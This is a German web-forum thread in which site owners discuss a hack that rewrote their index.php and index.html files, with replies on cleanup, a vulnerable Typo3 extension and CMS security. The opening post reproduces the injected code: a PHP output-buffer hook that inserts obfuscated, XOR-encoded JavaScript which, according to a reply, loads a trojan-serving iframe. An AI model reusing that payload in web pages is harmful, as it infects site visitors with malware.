ABAKUS

Hallo,

hat hier jemand ein ähnliches Problem gehabt??

Es sind sämtliche index.php sowie index.html Dateien geändert worden
Bei php mit
„<?
ob_start("phpfake");
php“

<?php
function phpfake($buffer)
{
$Exp='<script language="JavaScript">e = \'0x00\' + \'6E\';str1 = "%D5%8D%86%9B%F1%9C%9D%96%85%8A%D2%CF%9B%86%9C%86%8F%86%85%86%9D%96%D7%89%86%8D%8D%8A%83%CF%D3%D5%86%8B%9F%8E%82%8A%F1%9C%9F%8C%D2%CF%89%9D%9D%81%D7%C0%C0%96%8A%84%9D%8C%83%9D%C3%86%83%8B%80%C0%85%8D%C0%88%9A%8C%C0%CF%F1%98%86%8D%9D%89%D2%DE%F1%89%8A%86%88%89%9D%D2%DE%D3%D5%C0%86%8B%9F%8E%82%8A%D3%D5%C0%8D%86%9B%D3";str=tmp=\'\';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>';
return (ereg_replace("</body>", "$Exp</body>", $buffer));
}
?>

In den .html Dateien stand nur das Scrip drin.

Wurde der Server (Puretec) gehackt oder woran liegt das, dass sämtliche index Dateien geändert wurden sind?

Ja, der Server wurde gehackt.
Da ist per java script ein iframe-Aufruf verschlüsselt und holt einen Trojan auf Deine Domain.
Du wirst jetzt ganz schnell von Google einen Warnhinweis drangepappt kriegen.

Hallo Seo-Theo,

naja, das ganze war eine Stunde bis max. 1,5 Stunden online. Wir haben es zum Glück gleich gemerkt und sämtliche Passwörter und Dateien geändert, so dass es bei google nicht angekommen sein sollte.

beste Grüße medusa

Hatten wir auch. Kam über eine Extension von Typo3. Hatte aber nicht nur so gut wie alle (!) html und php-Dateien (mit unterschiedlichen Codes - auch JavaSscripte, in fast ALLEN Domains) verseucht, die einen Trojaner oä auf den Rechner des Users (nicht auf die Domain) bringen können, sondern auch config-Dateien und was weiß ich nicht noch alles angegriffen. Eine nette Geschichte wurde auf dem Server eingebaut, die die Root-Passwords an den Angreifer schickte (ich kenn mich nicht so gut aus, das macht mein Admin).

Das Ende der Geschichte: Server plattgemacht, völlig neu und jetzt sicher wieder aufgesetzt. Alles wird umgezogen, alle Typos neu aufgesetzt (Backups waren auch verseucht).

Wir haben unser Lehrgeld gezahlt (bzw sind noch dabei). Und viele andere auch.

Und es gibt sicher viele zig-Tausende, die noch überhaupt nix davon ahnen.

Eine ganz große Sch...

Ja ... mein Server wurde auch gehackt ... 11 Domains waren betroffen. Allerdings nur die index.php und index.html war mit dem Code zugeknallt.

Werde wohl den Hoster wechseln .... auf Supportanfragen diesbezüglich wird nicht reagiert ..... am Ende bin ich wieder daran Schuld

Hoster wechseln bringt da nur in den seltensten Fällen was, da solche Angriffe meist über unsichere Software laufen, die der Kunde installiert hat (z. B. Extensions für bekannte CMS, deren Exploits auf einschlägigen Webseiten zu finden sind).

Ich würd mittlerweile komplett davon abraten, Open-Source CMS System wie Typo3 oder Joomla zu nutzen ..... die Faulheit sich bei seinem System an der Theke der "KannAllesHatAlles"-Software zu bedienen bekommt man direkt durch "offene Scheunentore" bezahlt.

SEO ohne Programmierkenntnisse wird in Zukunft eh unmöglich ......

Da lief zwar das Typo3 aber nicht öffentlich (nicht im Domainroot erreichbar)sondern nur zum Testen.

"Öffentlich" ist für den "Interessierten" nur eine Frage der Qualifikation

Ja stimmt .... ich hatte mal zu Testzwecken das neue Joomla installiert. Danach konnte ich einige Ordner nicht mehr vom Server löschen.

Also CMS (free) werd ich wohl nie wieder einsetzen.

Um welche Typo3-Extension ging es konkret?

Das war die macina_banners.
Hier https://www.typo3.net/forum/list/list_p ... #pid240269
der Thread bei typo3.net

Okay. Ich hatte nach der Lektüre dieses Threads entdeckt, dass auch ve_guestbook in einer älteren Version sehr unsicher ist (stand in einem aktuellen Security Bulletin auf typo3.org). Diese Extension habe ich nun abgedichtet.

Ich würd mittlerweile komplett davon abraten, Open-Source CMS System wie Typo3 oder Joomla zu nutzen ..... die Faulheit sich bei seinem System an der Theke der "KannAllesHatAlles"-Software zu bedienen bekommt man direkt durch "offene Scheunentore" bezahlt.

@shapeshifter: Na ja, osCommerce, PHPNuke und andere kann man schon sicher betreiben, wenn man das nötige Know how hat. Dieser obige Open Source Verriß ist einfach oberflächlich.

Dem Satz zu "SEO ohne Prog-kenntnisse" stimme ich allerdings uneingeschränkt zu.

Na ja, osCommerce, PHPNuke und andere kann man schon sicher betreiben

PHPNuke würde ich überhaupt nicht erwähnen, der Ursprung schlechter OS CMS Systeme (eigentlich ist es nicht mal ein CMS, sondern eine Com.)

Und oscommerce hatte sich früher auch nicht mit Ruhm bekläckert, wie es heute ist weiß ich nicht.

Auf alle Fälle liegt es zu 99% an den verwendeten Software Programmen, das solche Sachen eingeschleust werden. OS Programme sind dazu immer beliebt, da hier der Code offen für alle vorliegt. Sehr beliebt sind PHP Programme, da hier auch Deppen sich alle Progger versuchen, ohne sich an minimale Sicherheitsstandards zu halten.